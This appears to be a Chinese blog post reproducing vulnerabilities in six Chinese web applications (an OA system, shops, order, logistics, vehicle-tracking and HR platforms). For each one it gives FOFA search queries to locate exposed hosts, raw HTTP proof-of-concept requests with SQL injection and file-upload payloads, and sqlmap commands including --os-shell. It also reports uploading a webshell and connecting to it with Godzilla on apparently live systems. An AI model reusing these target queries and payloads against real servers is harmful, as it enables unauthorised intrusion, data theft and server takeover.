护网漏洞复现(一)

news/2024/9/21 0:39:32/文章来源:https://www.cnblogs.com/LeouMaster/p/18395784

金程云OA UploadFile存在任意文件上传漏洞

描述:金程云OA UploadFile存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

fofa语法:body="images/yipeoplehover.png"

POC:

POST /OA/api/2.0/Common/AttachFile/UploadFile HTTP/1.1

Host: xxx.xxx.xxx.xxx

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNe8DcVuv1vEUWDaR

Content-Length: 191

------WebKitFormBoundaryNe8DcVuv1vEUWDaR

Content-Disposition: form-data; name="upload";filename="123.Asp"

<% response.write("hello,world") %>

------WebKitFormBoundaryNe8DcVuv1vEUWDaR--

漏洞复现:

fofa中搜索资产,共有339条数据匹配

img

以下为登录页面以及页面特征

img

当前页面抓包构造payload

img

文件已上传,访问http://xxx.xxx.xxx.xxx/OA/upfiles/temp/文件名

img

尝试上传一句话木马

img

哥斯拉连接成功

img

由于是存放在temp目录下的,如果不做权限维持的话,过不了多久木马文件见会被删除。

微商城系统goods.php存在SQL注入漏洞

描述:微商城系统goods.php接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息外,甚至在高权限的情况下可向服务器中写入木马,进一步获取服务器系统权限。

fofa语法:body="/Mao_Public/js/jquery-2.1.1.min.js"

POC:

GET /goods.php?id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170706271,0x6e63516a52476c6a6279686672466358565970534b6152786a595456464765644f5550486b674a5a,0x7171717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1

Accept: /

Accept-Encoding: gzip, deflate

Connection: close

漏洞复现:

fofa中搜索资产,共有433条数据匹配

img

访问测试网址,抓包构造payload

img

将url放入到sqlmap中进行测试

img

众诚网上订单系统o_sa_order存在SQL注入漏洞

描述:众诚网上订单系统o_sa_order存在SQL注入漏洞,未经授权的远程攻击者可以利用该漏洞获取数据库中的敏感信息,甚至在高权限的情况下获取数据库服务器系统权限。

fofa语法:title="欢迎使用众诚网上订单系统"

POC:

POST /ajax/o_sa_order.ashx HTTP/1.1

Host: xxx.xxx.xxx.xxx

Connection: keep-alive

Content-Length: 39

sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"

Accept: /

sec-ch-ua-platform: "Windows"

X-Requested-With: XMLHttpRequest

sec-ch-ua-mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: https:// xxx.xxx.xxx.xxx

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https://xxx.xxx.xxx.xxx/

Accept-Encoding: gzip, deflate, br, zstd

Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6,ja;q=0.5

Cookie: __session:0.9071926173178362:=https:

type=login&user_id=admin')--+&user_pwd=12345

漏洞复现:

fofa中搜索资产,共有23条数据匹配

img

以下为登录页面以及页面特征

img

随便输入用户名和密码,抓取登录数据包

图形用户界面, 文本, 应用程序  描述已自动生成

用户名和密码是随便输入的,所以会提示用户无效或密码错误

然后在user_id和user_pwd后面输入单引号使得系统报错

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

图形用户界面, 文本, 应用程序  描述已自动生成

发现在user_id处输入单引号会报错,那么注入点可能是在这里,然后就是判断闭合了

经过测试后发现测试payload为:’)--+

img

通过order by可以判断存在19个字段,接下来用sqlmap进行后续测试

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

img

还可以使用--os-shell参数执行命令,但是sqlmap中无法显示输出

img

东胜物流软件OPERATORCODEAdatpter存在SQL注入漏洞

描述:东胜物流软件OPERATORCODEAdatpater接口处存在SQL注入漏洞,攻击者除了可以利用该漏洞获取数据库中敏感信息外,甚至在高权限的情况下向服务器中写入木马,进一步获取服务器系统权限

fofa语法:body="CompanysAdapter.aspx"

POC:http://xxx.xxx.xxx.xxx/FeeCodes/OPERATORCODEAdapter.aspx?SHOWNAME=x&rName=&CUSTOMERNAME=1')--+

注入点在SHOWNAME以及CUSTOMERNAME处

漏洞复现:

fofa中搜索资产,共有1324条数据匹配

img

以下为登陆页面以及页面特征

图形用户界面  中度可信度描述已自动生成

访问http://xxx.xxx.xxx.xxx/FeeCodes/OPERATORCODEAdapter.aspx?SHOWNAME=x&rName=&CUSTOMERNAME=1

返回页面是空白的,单也说明了此接口存在,然后判断注入点以及闭合方式

在SHOWNAME处的闭合方式为:’--+

img

在CUSTOMERNAME=1处的闭合方式为:’)--+

文本  中度可信度描述已自动生成

将url放入sqlmap中进行测试

img

img

还可以用--os-shell远程执行命令

img

通天星CMSV6车载定位监控平台getAlarmAppealByGuid 存在SQL注入漏洞

描述:该漏洞是由于通天星CMSV6车载定位监控平台/alarm_appeal/getAlarmAppealByGuid接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取漏洞获取网站绝对路径写入后门文件进行远程代码执行

fofa语法:body="/808gps/"

POC:

POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Content-Type: application/x-www-form-urlencoded

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8

Accept-Encoding: gzip, deflate

guid=1') AND (SELECT 3904 FROM (SELECT(SLEEP(10)))PITq) AND ('qhqF'='qhqF

漏洞复现:

fofa中搜索资产,共有8114条数据匹配

img

访问测试地址,抓取数据包并构造payload

img

img

将数据包放入到sqlmap中进行测试,此次测试需要添加很多的参数,命令如下:

python3 sqlmap.py -r 1.txt --risk 3 --tamper=space2comment --random-agent --time-sec 10

img

同鑫T9eHR信息化管理系统GetFlowDropDownListLtems存在SQL注入漏洞

描述:同鑫T9eHR信息化管理系统的/Common/GetFlowDropDownListItems接口存在SQL注入漏洞,未经身份验证的攻击者可以通过该漏洞获取数据库敏感信息

fofa语法:body="T9eHR"

POC:

POST /Common/GetFlowDropDownListItems HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Accept-Encoding: gzip, deflate

Accept: /

Connection: close

Content-Type: application/x-www-form-urlencoded; charset=utf-8

Content-Length: 33

FixedFormCode=1'--+

漏洞复现:

fofa中搜索资产,共有587条数据匹配

img

以下为登录页面以及页面特征

图形用户界面, 应用程序  描述已自动生成

当前页面抓包构造payload

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

判断注入点以及闭合方式

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

可以用order by判断处该数据库存在两个字段

img

img

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/791962.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

LLM大模型基础知识学习总结

在这个已经被大模型包围的时代,不了解一点大模型的基础知识和相关概念,可能出去聊天都接不上话。刚好近期我也一直在用GPT和GitHub Copilot,也刚好对这些基础知识很感兴趣,于是学习了一下,做了如下的整理总结,分享与你!大家好,我是Edison。 在这个已经被大模型包围的时…

借助表格技术提升智能审计云平台应用体验

背景说明: 2009年,立信加入全球第五大国际会计网络——BDO国际。BDO 全球各地成员所均使用统一的审计方式,在完全遵守国际审计准则的原则同时,也会应不同地区要求提供附加指引,确保在全球提供一致的服务水平。如今,立信的审计过程及档案记录均已实现电子化。然而,审计工…

芯片电源入口VCC串联的小电阻

芯片电源入口VCC串联的小电阻 我们经常会看到,在一些芯片的电源入口处不是直接接入直流电源,而是在VCC入口串联一个几十欧姆的小电阻,这个电阻有什么作用呢? 示意图如下具体分析: 1.假设没有这个电阻R1,当芯片击穿后,芯片内部的VCC引脚跟GND短路,VCC引脚又直接跟电源15V…

高端制造业供应商伙伴管理的痛点是什么?怎么解决?

高端制造业供应商伙伴管理一般都会选择使用供应商管理系统(SRM, Supplier Relationship Management)来改善企业与供应链上游供应商的关系,提高采购效率,降低采购成本,并增强供应链的透明度和合规性。而SRM系统在一定程度上可以满足供应商伙伴管理的基础诉求,如供应商信息…

备受500强企业青睐的安全数据交换系统,到底有什么优势?

网络隔离成为常见的安全手段 网络隔离技术已成为许多企业进行网络安全建设的重要手段之一,党政单位、金融机构、半导体企业、以及能源电力、医疗、生物制药等等行业及领域的企业都会选择方式不一的网络隔离技术来保护自己的网络安全,规避互联网中的网络侵害。 网络隔离为企业…

DAG 求u到v路径数

DAG 求u到v的路径数先拓扑排序求出每个点的顺序,再对每个起点 \(s\) 做 dp,遍历拓扑序的点,对 \(s\) 能到达的点做 dp 统计路径数,如果终点 \(t\) 拓扑序在 \(s\) 之前就说明没有路径。 #include<bits/stdc++.h> using namespace std; #define ll long long #define …

晶振并联的1M电阻

晶振并联的1M电阻 与晶振并联的1M电阻是什么用?为何有的有用,有的没有用?应该如何选择? 在实际的产品设计时,针对晶振部分的电路,你会发现会有下面2种电路,图1电路中,没有1M的电阻;图2电路中,晶振会并联一个1M的电阻。晶振电路的相关问题1M电阻具体是什么作用呢?为什…

利用分布式锁在ASP.NET Core中实现防抖

前言 在 Web 应用开发过程中,防抖(Debounce) 是确保同一操作在短时间内不会被重复触发的一种有效手段。常见的场景包括防止用户在短时间内重复提交表单,或者避免多次点击按钮导致后台服务执行多次相同的操作。无论在单机环境中,还是在分布式系统中都有一些场景需要使用它。…

智慧水利河湖AI智能视频分析识别系统

智慧水利河湖AI智能视频分析识别系统运用视频结构型技术性,根据图像处理与分析,创建图像与图像叙述两者之间的投射关联,掌握视频图像中的內容,运用于水利管理方法情景。智慧水利河湖AI智能视频分析识别系统运用视频智能搜索分析,根据对非结构性原创设计视频数据信息的智能…

视频监控系统智能识别分析

视频监控系统智能识别分析可以合理处理因为监控点太多,工作人员没办法监控考虑到全部监控情景。传统监控是“处于被动监控”通常只有在“事件”发生后根据启用视频回看查找线索。视频监控系统智能识别分析主要特点是应用机器视觉,在几乎不用人工干涉的情形下,根据海康或者大…

加油站AI智能视频监控分析系统

加油站AI智能视频监控分析系统可以根据视频总流量分析技术,使优化算法实体模型替代人的眼睛,即时鉴别加油站内部的工作过程中的安全规范、员工行为准则等问题。加油站AI智能视频监控分析系统优化算法实体模型可以精确捕获违规操作,全年度24个小时无间断,各种不良行为并发送…

智能视频分析ai图像精准智能识别

智能视频分析ai图像精准智能识别包含图像解决、数字图像处理、行为识别、状态识别 、视频帧全自动监控分析,体现了智能视频分析ai图像精准智能识别的工作能力。根据智能视频分析ai图像精准智能识别,智能视频内嵌式识别专用工具可以分析监控视频监管下的图像,并将合理信息内容…